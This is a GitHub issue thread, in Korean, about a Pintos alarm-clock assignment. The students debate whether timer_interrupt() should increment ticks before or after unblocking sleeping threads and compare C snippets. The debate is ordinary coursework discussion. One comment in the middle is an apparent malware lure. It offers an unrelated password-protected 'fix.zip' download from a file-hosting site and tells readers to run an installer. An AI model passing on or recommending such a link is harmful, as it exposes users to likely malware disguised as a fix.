### ISSUE TITLE
[Project 1/Alarm clock] @Yeram522 timer.c : timer_interrupt() ticks 처리 로직 

### ISSUE THREAD

**Issue by Yeram522** [Yeram522/W08-Pintos#11]
timer_interrupt 함수는 ticks를 계산하는 아주 중요한 역할을 하는데, ticks를 1올려주기 전에 로직을 추가하면 로직이 실행되는 동안 ticks에 변화가 없기 때문에 ticks를 참조하는 다른 인터럽트나 스레드에서 오류가 날 수 있다고 합니다.
추가적으로 thread_tick 함수 호출의 위치에 대해
thread_tick 함수는 현재 CPU를 점유 중인 스레드가 점유하고 있던 기간의 ticks와 TIME_SLICE를 비교하여 TIME_SLICE를 지났다면 강제로 점유를 빼앗아 양보시키는데요, 저희가 추가한 반복 로직에서 ready 상태가 된 스레드들도 양보를 받을 기회를 주기 위해 로직 후에 thread_tick을 호출하였습니다. <- 근데 사실 이렇게 하는게 맞는건지는 모르겠습니다( ᵕ̩̩ㅅᵕ̩̩ );;

_Originally posted by @yujin0124 in https://github.com/Yeram522/W08-Pintos/pull/9#discussion_r1730733228_

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Yeram522** [comment]
### 💡 **ticks 처리 로직의 정당성 탐구**

저는 **alarm-simultaneous** test에서 FAIL을 받았었습니다. https://github.com/Yeram522/W08-Pintos/pull/7#issue-2485138649

_@yujin0124 님의 코드와 비교해본 결과, `ticks++` ticks 증가 코드의 위치가 다르다는 점을 발견했습니다._ https://github.com/Yeram522/W08-Pintos/pull/9#discussion_r1730711816

제 코드는 아래와 같습니다.
``` c
/* Timer interrupt handler. */
static void
timer_interrupt(struct intr_frame *args UNUSED)
{
    while (e != list_end(&sleep_list))
    {
        // -- <생략>
        if (timer_ticks() < t->wake_up_ticks)
            break;  // Assume sorting list
        // -- <생략>
        thread_unblock(t); // use unblock func
    }
    
   ticks++;
   thread_tick();
}
```
while문으로 `sleep_list`에서 깨워져야 할 스레드를 wake up 시킨 후 `ticks`를 증가시키고 있습니다.

while문의 wake_up 로직을 보면, `timer_ticks()`로 현재 ticks를 가져와 thread의 `wake_up_ticks`와 비교한 후 **status**를 변경해주고 있습니다.
``` c
if (timer_ticks() < t->wake_up_ticks)
```
#### 하지만 이렇게 되면 깨워진 thread에게 치명적인 영향을 줄 수 있습니다.
wake up을 하는 기준은 현재 ticks를 기준으로 깨우지만, wake up한 뒤 현재 ticks를 증가시키면
현재 ticks와 wake up된 스레드의 꺠워진 시각이 불일치 하게 됩니다.

따라서 다른 시간 관련 함수들이 오래된 ticks를 기반으로 동작할 가능성이 있습니다.
이후 연쇄적으로 인터럽트 주기에 영향을 미칠 수 있기 때문에 시간 관련 연산의 정확성이 떨어질 수 있습니다.

따라서 올바른 로직은 다음과 같습니다.
``` c
/* Timer interrupt handler. */
static void
timer_interrupt(struct intr_frame *args UNUSED)
{
    ticks++;

    while (e != list_end(&sleep_list))
    {
        // -- <생략>
        if (timer_ticks() < t->wake_up_ticks)
            break;  // Assume sorting list
        // -- <생략>
        thread_unblock(t); // use unblock func
    }
    
   thread_tick();
}
```

#### time interrupt가 발생하면 즉시 ticks를 증가시켜 시간의 정확성을 유지시킵니다.
따라서 wake_up 된 스레드들은 다른 ticks들도 최신의 값을 기준으로 처리되게 할 수 있습니다.
